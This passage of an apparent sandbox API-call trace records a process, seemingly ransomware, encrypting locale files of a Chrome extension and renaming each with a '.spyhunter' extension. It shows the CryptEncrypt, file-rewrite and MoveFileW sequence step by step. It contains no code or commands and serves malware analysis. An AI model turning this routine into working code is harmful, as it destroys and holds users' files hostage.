lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.654] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.654] WriteFile (in: hFile=0xec, lpBuffer=0x25cf434*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf3f4, lpOverlapped=0x0 | out: lpBuffer=0x25cf434*, lpNumberOfBytesWritten=0x25cf3f4*=0x4, lpOverlapped=0x0) returned 1 [0134.654] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf3f4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf3f4*=0x30, lpOverlapped=0x0) returned 1 [0134.654] CloseHandle (hObject=0xec) returned 1 [0134.654] GetProcessHeap () returned 0x2c0000 [0134.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.655] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.spyhunter") returned 166 [0134.655] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.spyhunter")) returned 1 [0134.655] GetProcessHeap () returned 0x2c0000 [0134.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.656] GetProcessHeap () returned 0x2c0000 [0134.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.656] GetProcessHeap () returned 0x2c0000 [0134.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80370 | out: hHeap=0x2c0000) returned 1 [0134.667] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf428 | out: pbBuffer=0x25cf428) returned 1 [0134.667] GetProcessHeap () returned 0x2c0000 [0134.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.667] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf420*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf420*=0x30) returned 1 [0134.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.667] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json") returned 159 [0134.667] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.667] GetProcessHeap () returned 0x2c0000 [0134.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.667] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf3e4*=0x108, lpOverlapped=0x0) returned 1 [0134.668] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.668] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x25cf3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf3e4*=0x108, lpOverlapped=0x0) returned 1 [0134.668] GetProcessHeap () returned 0x2c0000 [0134.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.669] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.669] WriteFile (in: hFile=0xec, lpBuffer=0x25cf424*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf3e4, lpOverlapped=0x0 | out: lpBuffer=0x25cf424*, lpNumberOfBytesWritten=0x25cf3e4*=0x4, lpOverlapped=0x0) returned 1 [0134.669] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf3e4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf3e4*=0x30, lpOverlapped=0x0) returned 1 [0134.669] CloseHandle (hObject=0xec) returned 1 [0134.669] GetProcessHeap () returned 0x2c0000 [0134.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.669] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.spyhunter") returned 169 [0134.669] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json.spyhunter")) returned 1 [0134.670] GetProcessHeap () returned 0x2c0000 [0134.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.670] GetProcessHeap () returned 0x2c0000 [0134.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.670] GetProcessHeap () returned 0x2c0000 [0134.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80370 | out: hHeap=0x2c0000) returned 1 [0134.670] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf428 | out: pbBuffer=0x25cf428) returned 1 [0134.670] GetProcessHeap () returned 0x2c0000 [0134.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.670] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf420*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf420*=0x30) returned 1 [0134.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.671] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json") returned 156 [0134.671] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.671] GetProcessHeap () returned 0x2c0000 [0134.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.671] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf3e4*=0xf3, lpOverlapped=0x0) returned 1 [0134.672] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.672] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xf3, lpNumberOfBytesWritten=0x25cf3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf3e4*=0xf3, lpOverlapped=0x0) returned 1 [0134.672] GetProcessHeap () returned 0x2c0000 [0134.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.672] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.673] WriteFile (in: hFile=0xec, lpBuffer=0x25cf424*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf3e4, lpOverlapped=0x0 | out: lpBuffer=0x25cf424*, lpNumberOfBytesWritten=0x25cf3e4*=0x4, lpOverlapped=0x0) returned 1 [0135.086] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf3e4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf3e4*=0x30, lpOverlapped=0x0) returned 1 [0135.086] CloseHandle (hObject=0xec) returned 1 [0135.086] GetProcessHeap () returned 0x2c0000 [0135.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.086] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.spyhunter") returned 166 [0135.087] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.spyhunter")) returned 1 [0135.087] GetProcessHeap () returned 0x2c0000 [0135.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.087] GetProcessHeap () returned 0x2c0000 [0135.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.088] GetProcessHeap () returned 0x2c0000 [0135.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80060 | out: hHeap=0x2c0000) returned 1 [0135.089] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf420 | out: pbBuffer=0x25cf420) returned 1 [0135.089] GetProcessHeap () returned 0x2c0000 [0135.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.089] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf418*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf418*=0x30) returned 1 [0135.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json") returned 156 [0135.090] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.090] GetProcessHeap () returned 0x2c0000 [0135.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.090] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf3dc*=0x103, lpOverlapped=0x0) returned 1 [0135.091] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.091] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x103, lpNumberOfBytesWritten=0x25cf3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf3dc*=0x103, lpOverlapped=0x0) returned 1 [0135.091] GetProcessHeap () returned 0x2c0000 [0135.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.091] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.091] WriteFile (in: hFile=0xec, lpBuffer=0x25cf41c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf3dc, lpOverlapped=0x0 | out: lpBuffer=0x25cf41c*, lpNumberOfBytesWritten=0x25cf3dc*=0x4, lpOverlapped=0x0) returned 1 [0135.091] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf3dc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf3dc*=0x30, lpOverlapped=0x0) returned 1 [0135.092] CloseHandle (hObject=0xec) returned 1 [0135.092] GetProcessHeap () returned 0x2c0000 [0135.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.092] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.spyhunter") returned 166 [0135.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.spyhunter")) returned 1 [0135.094] GetProcessHeap () returned 0x2c0000 [0135.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.094] GetProcessHeap () returned 0x2c0000 [0135.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.094] GetProcessHeap () returned 0x2c0000 [0135.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fd50 | out: hHeap=0x2c0000) returned 1 [0135.096] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf418 | out: pbBuffer=0x25cf418) returned 1 [0135.096] GetProcessHeap () returned 0x2c0000 [0135.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.096] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf410*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf410*=0x30) returned 1 [0135.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.097] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json") returned 156 [0135.097] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.097] GetProcessHeap () returned 0x2c0000 [0135.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.097] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf3d4*=0x109, lpOverlapped=0x0) returned 1 [0135.098] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffef7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.098] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0x25cf3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf3d4*=0x109, lpOverlapped=0x0) returned 1 [0135.098] GetProcessHeap () returned 0x2c0000 [0135.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.098] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.098] WriteFile (in: hFile=0xec, lpBuffer=0x25cf414*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf3d4, lpOverlapped=0x0 | out: lpBuffer=0x25cf414*, lpNumberOfBytesWritten=0x25cf3d4*=0x4, lpOverlapped=0x0) returned 1 [0135.098] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf3d4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf3d4*=0x30, lpOverlapped=0x0) returned 1 [0135.098] CloseHandle (hObject=0xec) returned 1 [0135.099] GetProcessHeap () returned 0x2c0000 [0135.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.099] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.spyhunter") returned 166 [0135.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.spyhunter")) returned 1 [0135.099] GetProcessHeap () returned 0x2c0000 [0135.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.100] GetProcessHeap () returned 0x2c0000 [0135.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.100] GetProcessHeap () returned 0x2c0000 [0135.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fa40 | out: hHeap=0x2c0000) returned 1 [0135.101] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf410 | out: pbBuffer=0x25cf410) returned 1 [0135.101] GetProcessHeap () returned 0x2c0000 [0135.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.101] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf408*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf408*=0x30) returned 1 [0135.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.102] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json") returned 156 [0135.102] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.102] GetProcessHeap () returned 0x2c0000 [0135.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.102] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf3cc*=0x13f, lpOverlapped=0x0) returned 1 [0135.103] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffec1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.103] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x13f, lpNumberOfBytesWritten=0x25cf3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf3cc*=0x13f, lpOverlapped=0x0) returned 1 [0135.103] GetProcessHeap () returned 0x2c0000 [0135.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.103] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.103] WriteFile (in: hFile=0xec, lpBuffer=0x25cf40c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf3cc, lpOverlapped=0x0 | out: lpBuffer=0x25cf40c*, lpNumberOfBytesWritten=0x25cf3cc*=0x4, lpOverlapped=0x0) returned 1 [0135.103] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf3cc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf3cc*=0x30, lpOverlapped=0x0) returned 1 [0135.104] CloseHandle (hObject=0xec) returned 1 [0135.104] GetProcessHeap () returned 0x2c0000 [0135.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.104] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.spyhunter") returned 166 [0135.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: 